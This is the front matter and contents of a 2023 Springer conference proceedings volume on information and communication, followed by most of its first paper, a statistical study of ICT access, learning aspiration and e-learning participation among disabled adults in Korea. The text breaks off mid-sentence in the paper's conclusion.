379 119 90MB
English Pages 926 [927] Year 2023
Lecture Notes in Networks and Systems 652
Kohei Arai Editor
Advances in Information and Communication Proceedings of the 2023 Future of Information and Communication Conference (FICC), Volume 2
Lecture Notes in Networks and Systems
652
Series Editor Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland
Advisory Editors Fernando Gomide, Department of Computer Engineering and Automation—DCA, School of Electrical and Computer Engineering—FEEC, University of Campinas—UNICAMP, São Paulo, Brazil Okyay Kaynak, Department of Electrical and Electronic Engineering, Bogazici University, Istanbul, Turkey Derong Liu, Department of Electrical and Computer Engineering, University of Illinois at Chicago, Chicago, USA Institute of Automation, Chinese Academy of Sciences, Beijing, China Witold Pedrycz, Department of Electrical and Computer Engineering, University of Alberta, Alberta, Canada Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland Marios M. Polycarpou, Department of Electrical and Computer Engineering, KIOS Research Center for Intelligent Systems and Networks, University of Cyprus, Nicosia, Cyprus Imre J. Rudas, Óbuda University, Budapest, Hungary Jun Wang, Department of Computer Science, City University of Hong Kong, Kowloon, Hong Kong
The series “Lecture Notes in Networks and Systems” publishes the latest developments in Networks and Systems—quickly, informally and with high quality. Original research reported in proceedings and post-proceedings represents the core of LNNS. Volumes published in LNNS embrace all aspects and subfields of, as well as new challenges in, Networks and Systems. The series contains proceedings and edited volumes in systems and networks, spanning the areas of Cyber-Physical Systems, Autonomous Systems, Sensor Networks, Control Systems, Energy Systems, Automotive Systems, Biological Systems, Vehicular Networking and Connected Vehicles, Aerospace Systems, Automation, Manufacturing, Smart Grids, Nonlinear Systems, Power Systems, Robotics, Social Systems, Economic Systems and other. Of particular value to both the contributors and the readership are the short publication timeframe and the world-wide distribution and exposure which enable both a wide and rapid dissemination of research output. The series covers the theory, applications, and perspectives on the state of the art and future developments relevant to systems and networks, decision making, control, complex processes and related areas, as embedded in the fields of interdisciplinary and applied sciences, engineering, computer science, physics, economics, social, and life sciences, as well as the paradigms and methodologies behind them. Indexed by SCOPUS, INSPEC, WTI Frankfurt eG, zbMATH, SCImago. All books published in the series are submitted for consideration in Web of Science. For proposals from Asia please contact Aninda Bose ([email protected]).
Kohei Arai Editor
Advances in Information and Communication Proceedings of the 2023 Future of Information and Communication Conference (FICC), Volume 2
Editor Kohei Arai Faculty of Science and Engineering Saga University Saga, Japan
ISSN 2367-3370 ISSN 2367-3389 (electronic) Lecture Notes in Networks and Systems ISBN 978-3-031-28072-6 ISBN 978-3-031-28073-3 (eBook) https://doi.org/10.1007/978-3-031-28073-3 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland
Preface
We are extremely delighted to bring forth the eighth edition of Future of Information and Computing Conference, 2023 (FICC 2023) held successfully on 2 and 3 March 2023. We successfully leveraged the advantages of technology for seamlessly organizing the conference in a virtual mode which allowed 150+ attendees from 45+ nations across the globe to attend this phenomenal event. The conference allowed learned scholars, researchers and corporate tycoons to share their valuable and out-of-the-box studies related to communication, data science, computing and Internet of things. The thought-provoking keynote addresses, unique and informative paper presentations and useful virtual roundtables were the key attractions of this conference. The astounding success of the conference can be gauged by the overwhelming response in terms of papers received. A total number of 369 papers were received, out of which 143 were handpicked by careful review in terms of originality, applicability and presentation, and 119 are finally published in this edition. The papers not only presented various novel and innovative ways of dealing with mundane, time-consuming and repetitive tasks in a fool-proof manner but also provided a sneak peek into the future where technology would be an inseparable part of each one’s life. The studies also gave an important thread for future research and beckoned all the bright minds to foray in those fields. The conference indeed brought about a scientific awakening amongst all its participants and viewers and is bound to bring about a renaissance in the field of communication and computing. The conference could not have been successful without the hard work of many people on stage and back stage. The keen interest of authors along with the comprehensive evaluation of papers by technical committee members was the main driver of the conference. The session chairs committee’s efforts were noteworthy. We would like to express our heartfelt gratitude to all the above stakeholders. A special note of thanks to our wonderful keynote speakers who added sparkle to the entire event. Last but certainly not least, we would extend our gratitude to the organizing committee who toiled hard to make this virtual event a grand success. We sincerely hope to provide an enriching and nourishing food for thought to our readers by means of our well-researched studies published in this edition. The overwhelming response by authors, participants and readers motivates us to better ourselves each time. We hope to receive continued support and enthusiastic participation from our distinguished scientific fraternity. Regards, Kohei Arai
Contents
The Disabled’s Learning Aspiration and E-Learning Participation . . . . . . . . . . . . Seonglim Lee, Jaehye Suk, Jinu Jung, Lu Tan, and Xinyu Wang
1
Are CK Metrics Enough to Detect Design Patterns? . . . . . . . . . . . . . . . . . . . . . . . . Gcinizwe Dlamini, Swati Megha, and Sirojiddin Komolov
11
Detecting Cyberbullying from Tweets Through Machine Learning Techniques with Sentiment Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jalal Omer Atoum DNA Genome Classification with Machine Learning and Image Descriptors . . . Daniel Prado Cussi and V. E. Machaca Arceda A Review of Intrusion Detection Systems Using Machine Learning: Attacks, Algorithms and Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jose Luis Gutierrez-Garcia, Eddy Sanchez-DelaCruz, and Maria del Pilar Pozos-Parra
25
39
59
Head Orientation of Public Speakers: Variation with Emotion, Profession and Age . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Yatheendra Pravan Kidambi Murali, Carl Vogel, and Khurshid Ahmad
79
Using Machine Learning to Identify Top Antecedents Affecting Crime in US Communities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Kamil Samara
96
Hybrid Quantum Machine Learning Classifier with Classical Neural Network Transfer Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 Avery Leider, Gio Giorgio Abou Jaoude, and Pauline Mosley Repeated Potentiality Augmentation for Multi-layered Neural Networks . . . . . . . 117 Ryotaro Kamimura SGAS-es: Avoiding Performance Collapse by Sequential Greedy Architecture Search with the Early Stopping Indicator . . . . . . . . . . . . . . . . . . . . . . 135 Shih-Ping Lin and Sheng-De Wang Artificial Intelligence in Forensic Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 Nazneen Mansoor and Alexander Iliev
viii
Contents
Deep Learning Based Approach for Human Intention Estimation in Lower-Back Exoskeleton . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164 Valeriya Zanina, Gcinizwe Dlamini, and Vadim Palyonov TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183 Anh-Duy Pham, Anastassia Kuestenmacher, and Paul G. Ploeger AI in Cryptocurrency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205 Alexander I. Iliev and Malvika Panwar Short Term Solar Power Forecasting Using Deep Neural Networks . . . . . . . . . . . 218 Sana Mohsin Babbar and Lau Chee Yong Convolutional Neural Networks for Fault Diagnosis and Condition Monitoring of Induction Motors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233 Fatemeh Davoudi Kakhki and Armin Moghadam Huber Loss and Neural Networks Application in Property Price Prediction . . . . . 242 Alexander I. Iliev and Amruth Anand Text Regression Analysis for Predictive Intervals Using Gradient Boosting . . . . 257 Alexander I. Iliev and Ankitha Raksha Chosen Methods of Improving Small Object Recognition with Weak Recognizable Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270 Magdalena Stacho´n and Marcin Pietro´n Factors Affecting the Adoption of Information Technology in the Context of Moroccan Smes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286 Yassine Zouhair, Mustapha Belaissaoui, and Younous El Mrini Aspects of the Central and Decentral Production Parameter Space, Its Meta-Order and Industrial Application Simulation Example . . . . . . . . . . . . . . . . . 297 Bernhard Heiden, Ronja Krimm, Bianca Tonino-Heiden, and Volodymyr Alieksieiev Gender Equality in Information Technology Processes: A Systematic Mapping Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 J. David Patón-Romero, Sunniva Block, Claudia Ayala, and Letizia Jaccheri The P vs. NP Problem and Attempts to Settle It via Perfect Graphs State-of-the-Art Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Maher Heal, Kia Dashtipour, and Mandar Gogate
Contents
ix
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth . . . . . 341 Mohammed Bergui, Nikola S. Nikolov, and Said Najah Survey of Schema Languages: On a Software Complexity Metric . . . . . . . . . . . . . 349 Kehinde Sotonwa, Johnson Adeyiga, Michael Adenibuyan, and Moyinoluwa Dosunmu Bohmian Quantum Field Theory and Quantum Computing . . . . . . . . . . . . . . . . . . 362 F. W. Roush Service-Oriented Multidisciplinary Computing: From Code Providers to Transdisciplines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372 Michael Sobolewski Incompressible Fluid Simulation Parallelization with OpenMP, MPI and CUDA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385 Xuan Jiang, Laurence Lu, and Linyue Song Predictive Analysis of Solar Energy Production Using Neural Networks . . . . . . . 396 Vinitha Hannah Subburaj, Nickolas Gallegos, Anitha Sarah Subburaj, Alexis Sopha, and Joshua MacFie Implementation of a Tag Playing Robot for Entertainment . . . . . . . . . . . . . . . . . . . 416 Mustafa Ayad, Jessica MacKay, and Tyrone Clarke English-Filipino Speech Topic Tagger Using Automatic Speech Recognition Modeling and Topic Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427 John Karl B. Tumpalan and Reginald Neil C. Recario A Novel Adaptive Fuzzy Logic Controller for DC-DC Buck Converters . . . . . . . 446 Thuc Kieu-Xuan and Duc-Cuong Quach Visual Mechanisms Inspired Efficient Transformers for Image and Video Quality Assessment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455 Junyong You and Zheng Zhang A Neural Network Based Approach for Estimation of Real Estate Prices . . . . . . 474 Ventsislav Nikolov Contextualizing Artificially Intelligent Morality: A Meta-ethnography of Theoretical, Political and Applied Ethics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482 Jennafer Shae Roberts and Laura N. Montoya
x
Contents
An Analysis of Current Fall Detection Systems and the Role of Smart Devices and Machine Learning in Future Systems . . . . . . . . . . . . . . . . . . . . . . . . . . 502 Edward R. Sykes Authentication Scheme Using Honey Sentences . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521 Nuril Kaunaini Rofiatunnajah and Ari Moesriami Barmawi HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol Using Heterogeneous Strong Designated Verifier Signature . . . . . . . . . . . . . . . . . . 541 Can Zhao, XiaoXiao Wang, Zhengzhu Lu, Jiahui Wang, Dejun Wang, and Bo Meng Framework for Multi-factor Authentication with Dynamically Generated Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 563 Ivaylo Chenchev Randomness Testing on Strict Key Avalanche Data Category on Confusion Properties of 3D-AES Block Cipher Cryptography Algorithm . . . . . . . . . . . . . . . . 577 Nor Azeala Mohd Yusof and Suriyani Ariffin A Proof of P ! = NP: New Symmetric Encryption Algorithm Against Any Linear Attacks and Differential Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 589 Gao Ming Python Cryptographic Secure Scripting Concerns: A Study of Three Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602 Grace LaMalva, Suzanna Schmeelk, and Dristi Dinesh Developing a GSM-GPS Based Tracking System: Vulnerable Nigerian School Children as a Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614 Afolayan Ifeoluwa and Idachaba Francis Standardization of Cybersecurity Concepts in Automotive Process Models: An Assessment Tool Proposal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635 Noha Moselhy and Ahmed Adel Mahmoud Factors Affecting the Persistence of Deleted Files on Digital Storage Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 656 Tahir M. Khan, James H. Jones Jr., and Alex V. Mbazirra Taphonomical Security: DNA Information with a Foreseeable Lifespan . . . . . . . 674 Fatima-Ezzahra El Orche, Marcel Hollenstein, Sarah Houdaigoui, David Naccache, Daria Pchelina, Peter B. Rønne, Peter Y. A. Ryan, Julien Weibel, and Robert Weil
Contents
xi
Evaluation and Analysis of Reversible Watermarking Techniques in WSN for Secure, Lightweight Design of IoT Applications: A Survey . . . . . . . . . . . . . . . 695 Tanya Koohpayeh Araghi, David Megías, and Andrea Rosales Securing Personally Identifiable Information (PII) in Personal Financial Statements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 709 George Hamilton, Medina Williams, and Tahir M. Khan Conceptual Mapping of the Cybersecurity Culture to Human Factor Domain Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 729 Emilia N. Mwim, Jabu Mtsweni, and Bester Chimbo Attacking Compressed Vision Transformers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743 Swapnil Parekh, Pratyush Shukla, and Devansh Shah Analysis of SSH Honeypot Effectiveness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 759 Connor Hetzler, Zachary Chen, and Tahir M. Khan Human Violence Recognition in Video Surveillance in Real-Time . . . . . . . . . . . . 783 Herwin Alayn Huillcen Baca, Flor de Luz Palomino Valdivia, Ivan Soria Solis, Mario Aquino Cruz, and Juan Carlos Gutierrez Caceres Establishing a Security Champion in Agile Software Teams: A Systematic Literature Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 796 Hege Aalvik, Anh Nguyen-Duc, Daniela Soares Cruzes, and Monica Iovan HTTPA: HTTPS Attestable Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811 Gordon King and Hans Wang HTTPA/2: A Trusted End-to-End Protocol for Web Services . . . . . . . . . . . . . . . . . 824 Gordon King and Hans Wang Qualitative Analysis of Synthetic Computer Network Data Using UMAP . . . . . . 849 Pasquale A. T. Zingo and Andrew P. Novocin Device for People Detection and Tracking Using Combined Color and Thermal Camera . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 862 Paweł Woronow, Karol Jedrasiak, Krzysztof Daniec, Hubert Podgorski, and Aleksander Nawrat Robotic Process Automation for Reducing Food Wastage in Swedish Grocery Stores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 875 Linus Leffler, Niclas Johansson Bräck, and Workneh Yilma Ayele
xii
Contents
A Survey Study of Psybersecurity: An Emerging Topic and Research Area . . . . 893 Ankur Chattopadhyay and Nahom Beyene Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 913
The Disabled’s Learning Aspiration and E-Learning Participation Seonglim Lee1 , Jaehye Suk2(B) , Jinu Jung1 , Lu Tan1 , and Xinyu Wang1 1 Department of Consumer Science, Convergence Program for Social Innovation,
Sungkyunkwan University, Seoul, South Korea 2 Convergence Program for Social Innovation, Sungkyunkwan University, Seoul, South Korea
[email protected]
Abstract. This study attempted to examine the effects of ICT access/usage and learning aspiration on the disableds e-learning participation, using data from the 2020 Survey on Digital Divide collected by the National Information Society Agency in Korea, a nationally representative sample of 4,606 individuals, including the disabled and non-disabled. Chi-square test, analysis of variance, and Structural Equation Modeling (SEM) were conducted. The major findings of this study were as follows. First, the types of disability did not have a significant effect on learning aspirations but significantly affected whether to participate in e-learning. The visual and hearing/language disabled were more likely to participate in elearning than the non-disabled. These findings suggest that the disabled have as much learning aspirations as the non-disabled. Rather, they have greater demand for e-learning. Second, access to PC/notebook and internet usage were related to more learning aspirations. Those who have stronger learning aspirations were more likely to participate in e-learning activities. Therefore, access to PC/notebook and internet usage not only directly affect e-learning participation and also indirectly affect e-learning participation through learning aspirations, compared to those who can not either access to PC/notebook or use the Internet. The findings suggest that ICT access and use are not merely a tool necessary for e-learning. They also contribute to e-learning by stimulating learning aspirations. Keywords: Disabled · E-learning · Learning aspiration · Access to ICT devices · Internet use
1 Introduction With the outbreak of the COVID-19 pandemic, the quarantine and lockdown policies worldwide have highlighted the strengths of e-learning, such as being cost-effective, time-efficient, and independent of time and place, leading to a rapidly growing trend of e-learning [1]. E-learning works well in breaking isolation and increasing social connections through their integration into a virtual learning community while learning new knowledge [2]. With the rising popularity of e-learning, consumers can now access educational resources more efficiently than before. E-learning can be an effective mode for the disabled to improve their access to education and help them integrate © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 1–10, 2023. https://doi.org/10.1007/978-3-031-28073-3_1
2
S. Lee et al.
into a knowledge-based economy and society [3]. In the case of socially isolated disabled people, they have a high demand for e-learning because of limited educational opportunities. Accessibility is the most crucial factor affecting e-learning participation [4]. Concerning e-learning for the disabled, the problems of accessibility and the application of assistive technologies have been consistently emphasized. Despite the fact that the disabled face various difficulties in taking e-learning classes, including shortages of and high cost of usable ICT devices and services, insufficient assistive technology, and lack of skills to use devices, etc. [5–7]; scant research has been conducted on their e-learning participation. This study aims to examine the e-learning participation of the Korean disabled, focusing on adult lifelong education. Specific research questions are as follows: 1) What is the difference in the e-learning participation rate, perceived effectiveness of e-learning, and learning aspiration between the disabled and non-disabled by the types of disabilities? 2) What is the difference in ICT access and use between the disabled and non-disabled by the types of disabilities? 3) How do the types of disability, ICT access and use, and learning aspiration affect e-learning participation? 4) Does learning aspiration mediate the relationship between the types of disability and e-learning participation and between access to and use of ICT and e-learning participation? This study will reveal the unique challenges for e-learning participation faced by the disabled and provide constructive suggestions to satisfy the disableds demand for learning.
2 Literature Review 2.1 Lifelong Education for the Disabled Lifelong education refers to learning and teaching activities conducted throughout life to improve the quality of human life [8]. It is a self-directed learning activity conducted by learners for self-realization and fulfillment throughout their lives [9]. Since lifelong education is learning for everyone, no one can be excluded from it. It satisfies humans unique learning instincts, guarantees the right to learn, improves the quality of life, and increases national competitiveness. The right to lifelong education for the disabled is not an optional requirement to compensate for the deficiency caused by the disability. Regardless of the presence or absence of disabilities, opportunities should be provided to guarantee the right to lifelong learning and lifelong education for humans, and equity should be secured. Lifelong education for the disabled is not only a means of satisfying their right to lifelong learning but also fosters the ability to cope with many hardships, difficulties, and unexpected situations that the disabled can experience in their lives [9, 10]. Ultimately, it is instrumental in realizing the self-reliance of the disabled pursued by welfare for the disabled
The Disabled’s Learning Aspiration and E-Learning Participation
3
[9]. However, most of the educational activities for the disabled so far are mainly aimed at school-age disabled people. To guarantee the right to lifelong learning of the disabled, not only the quantitative growth of lifelong education for the disabled but also the qualitative growth must be achieved. Therefore, it is necessary to investigate the demands of the disableds participation in lifelong education and develop a program based on this. In particular, e-learning provides effective educational opportunities as a tool that can offer teaching-learning opportunities that meet the individualized educational needs of the disabled. 2.2 E-Learning and the Disabled E-learning is the use of online resources in both distance and conventional learning contexts, and it can be described as “learning environments created using digital technologies which are networked and collaborative via internet technologies” [11]. E-learning includes computer-based training, online learning, virtual learning, and web-based learning and so on [12]. E-learning is considered an instructive result of the Information and Communication Technologies (ICTs) and essentially includes utilizing any electronic gadget, from P.C.s to cell phones [13]. The technology behind e-learning brings many benefits during use. For educational institutions, the major benefits of e-learning are that it compensates for the scarcity of academic personnel and enhances knowledge efficiency and competency through easy access to vast bulk of information [14]. For individual learners, e-learning can remove the barriers associated with transportation, discrimination, and racism and promote learners to implement a self-paced learning process through flexibility, accessibility, and convenience [15, 16]. All humans desire to learn, especially the socially isolated disabled have a strong desire for learning [17]. However, due to the relatively low accessibility to new technologies, alienation problems faced by disabled people who may appear in education or learning may arise. In this respect, the participation of the disabled in e-learning is essential. The use of e-learning by learners with disabilities can enhance independence, facilitate their learning needs, and enable them to use their additional specialist technology [18]. However, there are some difficulties in the e-learning usage progress experienced by disabled individuals. For example, learners with mental disabilities face problems with a professors insufficient use of e-learning, hearing disability learners experience issues with accessibility to audio and video materials, and visual disability learners have difficulty accessing lecture notes and materials. For disabled learners, the limited accessibility negatively affects learning and acquiring new skills for learners with disability [3, 19, 20]. E-learning offers a number of opportunities for persons with disabilities by facilitating access to new services, knowledge, and work from any place and breaking the isolation that disabled people feel in life [2]. Recent research on e-learning for learners with disabilities has focused mainly on examining e-learning usage and issues in specific countries. The main reason consumers do not participate in e-learning activities is accessibility [4] and a severe lack of assistive technology in computer labs and libraries [7]. Specifically, compared with disabled people, non-disabled people have a better ability to use e-learning tools because disabled
4
S. Lee et al.
people are more mentally and physically stressed in social pressure tasks than nondisabled people [21].
3 Method 3.1 Sample This study used data from the 2020 Survey on Digital Divide collected by the National Information Society Agency in Korea. This nationwide survey provided information on the e-learning experience of disabled and non-disabled people and ICT use. Among the 9,200 nationally representative survey participants, a sample of 4,606 individuals in their 30s to 50s consisting of the 1,164 disabled and 3,442 non-disabled people were selected for the analysis. The descriptive characteristics of the sample are shown in Table 1. Table 1. Descriptive statistics of the sample (N = 4,606, Weighted) Variables
Disabled (N = 1,164)
Non-disabled (N = 3,442)
Freq.
(%)
Freq.
(%)
Gender
Male
846
72.68
1763
51.22
Female
318
27.32
1679
48.78
Age
30s
130
11.17
1030
29.92
40s
338
29.04
1183
34.37
Education
Occupation
Income
Mean(SD)
50s
696
59.79
1229
35.71
≤Middle school
313
26.89
41
1.19
High school
695
59.71
1562
45.38
≥College
156
13.4
1839
53.43
White color
115
9.88
1222
35.5
Service
84
7.22
472
13.71
Sales
95
8.16
690
20.05
Blue color
272
23.37
511
14.85
House-keeping
177
15.21
538
15.63
Not-working
421
36.17
9
0.26
270.30
(140.87)
442.84
(119.42)
3.2 Measurement The dependent variable was whether to participate in e-learning participation. The elearning participants were coded as one and coded as zero otherwise. The independent
The Disabled’s Learning Aspiration and E-Learning Participation
5
variable included the types of disability and ICT use. Disability consisted of four dummy variables identifying physical, brain lesions, visual, and hearing/language disabilities. ICT use variables which consisted of access to ICT devices and internet use. They were measured with three dummy variables indicating whether one can access desktop/notebook and mobile devices and whether one can use the Internet during the last month. The mediation variable was the aspiration for learning, which was measured with three items on a four-point Likert scale ranging from one (“not at all”) to four (“very much”). Socio-demographic variables such as gender, education, age group, occupation, and the logarithm of family income were included as the control variables. 3.3 Analysis Chi-square test, analysis of variance using Generalized Linear Model (GLM), and Structural Equation Modeling (SEM) were conducted. The STATA (version 17) was utilized.
4 Results 4.1 E-Learning Participation Rate and Perceived Effectiveness of E-Learning Table 2 shows the distribution of e-learning participation rates and the perceived effectiveness of e-learning by the types of disability and non-disability. The e-learning participation rates for the physical and hearing/language disabled were higher but lower for those of the brain lesion and visual disabled compared to the e-learning participation rate for the non-disabled. Perceived effectiveness for e-learning was significantly different among the types of the disabled. From the analysis using the whole sample, including nonparticipants in e-learning, the hearing and language disabled perceived e-learning as effective as the non-disabled. From the analysis using the participants only, the perceived effectiveness of e-learning was not significant among the physical, visual, and hearing/language disabled and the non-disabled. Overall e-learning participant sample perceived e-learning as more effective than the whole sample, including non-participants. The results suggested that some non-participants expected e-learning to be less effective than those who have experienced e-learning. The learning aspiration score was the highest for the non-disabled (2.82), followed by the hearing/language disabled (2.55), physical disabled (2.52), visual disabled (2.28), and brain lesion (2.24). Overall the disabled had lower learning aspirations than the non-disabled. Specifically, the brain lesion and visual disabled showed the two lowest learning aspiration scores. 4.2 ICT Access and Use Table 3 shows the percent distribution of access to ICT devices and internet use rates. Overall the non-disabled showed higher access and usage rates than the disabled. Almost all non-disabled accessed mobile devices and used the Internet. The rates of ICT access
6
S. Lee et al. Table 2. E-learning participants and perceived effectiveness of E-learning Disabled
Non-disabled
Chi sq/ F value
35.71
28.73
37.42***
2.65
2.82
2.82
16.08***
(0.92)
(0.81)
(0.50)
Physical
Brain lesion
Visual
Hearing/ Language
Participation rate (%)
37.70
15.93
15.82
Perceived effectiveness (total sample)
2.62
2.4
(0.87)
(0.81)
b
c
b
a
a
Perceived effectiveness (participants)
2.83
2.72
2.84
2.88
3.07
(0.78)
(0.67)
(0.8)
(0.72)
(0.68)
ab
b
ab
ab
a
Learning aspiration
2.52
2.44
2.28
2.55
2.82
(0.65)
(0.71)
(0.69)
(0.64)
(0.57)
b
c
c
b
a
7.55***
87.92***
* p < .05, ** p < .01, *** p < .001
and Internet use were different among the types of disability. Overall the physical and hearing/language were more likely to access and use ICT than the other disabled. The rate of access to mobile devices was higher than that of access to desktops/notebooks among the disabled. The visual disabled showed the lowest internet use and access to mobile device rates. These findings suggested that the visual disabled may be most disadvantageous in ICT access and use. Table 3. ICT access and use Disabled (%)
Non-disabled (%)
Physical
Brain lesion
Visual
Hearing/ Language
Desktop/Notebook
81.43
60.18
71.52
75.00
90.62
Mobile
94.37
84.96
82.28
96.43
99.74
Internet use
91.42
77.88
72.28
97.32
99.45
4.3 The Results of Structural Equation Model for E-Learning Participation The results of the SEM analysis are presented in Table 4. The fitness index of the structural model was χ2 = 1114.282 (P = 0.000), CFI = 0.975, TLI = 0.852, RMSEA = .044, SRMR = 0.007, thus indicating that the model was acceptable.
The Disabled’s Learning Aspiration and E-Learning Participation
7
As shown in Table 4, whether to access PC/notebook and internet use were significantly associated with learning aspiration. Those who accessed to PC/notebook and used the Internet were more likely to participate in e-learning. The types of disability were not significantly related to e-learning participation, controlling ICT access and usage variables, and socio-demographic variables. The results suggested that the disability itself did not affect learning aspiration. But the ICT environment and socio-economic conditions were influential in having learning aspirations. Those in their 30s and 40s were significantly higher learning aspirations than those in their 50s. Higher family income, having a white color, service, and sales jobs than not working were significantly associated with higher learning aspirations. The variables which significantly affected e-learning participation were learning aspiration, the types of disability, ICT access and use, gender, and age groups. The physical and hearing/language disabled were more likely to participate in e-learning than Table 4. Result of structural equation model ansalysis for e-learning participation Learning aspiration B 0.072
(0.062)
0.159 (0.047)***
Brain
–0.047
(0.085)
0.032 (0.055)
Visual
–0.041
(0.076)
0.035 (0.051)
0.079
(0.080)
0.147 (0.058)**
P.C./notebook
0.104
(0.108)***
0.050 (0.025)*
Mobile
Physical
Hearing/Language Access to devices
Bootstrap (S.E) 0.199 (0.014)***
Learning aspiration Disable (Non-disabled)1 )
E-learning participation
Bootstap (S.E) B
0.491
(0.091
Internet use
1.426
(0.124)***
Male (Female)1 )
0.040
(0.027)
−0.024 (0.036) 0.129 (0.033)*** −0.044 (0.019)**
Education (Middle school)1 )
High school
Age group (the 50s)1 )
The 30s
0.2237 (0.031)***
0.178 (0.027)***
The 40s
0.072 (0.020)***
Log(income)
0.0964 (0.028)*** 0.123 (0.039)**
Occupation(Non)1) White
0.298
(0.040)***
Service
0.132
(0.046)***
Sales
0.218
(0.041)***
Blue
0.072
(0.039)
1.429
(0.121)***
Constant
College
−0.016 (0.026)
–0.356 (0.079)***
Notes: 1) The reference point for the dummy variable. Based on 3,000 bootstrap samples (n = 2,351). * p < .05, ** p < .01, *** p < .001
8
S. Lee et al.
the non-disabled. Those who had higher e-learning aspirations, accessed PC/notebook, and used the Internet were more likely to participate in e-learning. As shown in Table 5, we found a positive mediation effect of learning aspiration in the relationship between ICT access/usage and e-learning participation. Furthermore, the results indicated that ICT access and usage not only directly affected e-learning participation but also had indirect influence through enhancing learning aspiration. Table 5. Mediation effect of learning aspiration on e-learning participation Path
Effect
Bootstrap S.E
95% CI Lower
Upper
Access to PC/notebook → Learning aspiration → E-learning participation
.029***
.008
.013
.045
Internet use → Learning aspiration → E-learning participation
.098***
.020
.059
.136
Notes: Based on 3,000 bootstrap samples. CI = confidence interval. * p < .05, ** p < .01, *** p < .001
5 Conclusion This study attempted to examine the effects of ICT access/usage and learning aspiration on the disableds e-learning participation, using a nationally representative sample of the Korean population. The major findings of this study were as follows. First, the types of disability did not have a significant effect on learning aspirations but significantly affected whether to participate in e-learning. The visual and hearing/language disabled were more likely to participate in e-learning than the non-disabled. These findings suggest that the disabled have as much learning aspiration as the non-disabled. Rather, they have greater demand for e-learning. Second, access to PC/notebook and internet usage were related to more learning aspirations. Those who have stronger learning aspirations were more likely to participate in e-learning activities. Therefore, access to PC/notebook and internet usage not only directly affect e-learning participation and also indirectly affect e-learning participation through learning aspirations, compared to those who can not either access to PC/notebook or use the Internet. The findings suggest that ICT access and use are not merely a tool necessary for e-learning but they also contribute to e-learning by stimulating learning aspirations. However, the disabled showed lower access to desktop/notebook and internet use rates than the non-disabled. Notably, the 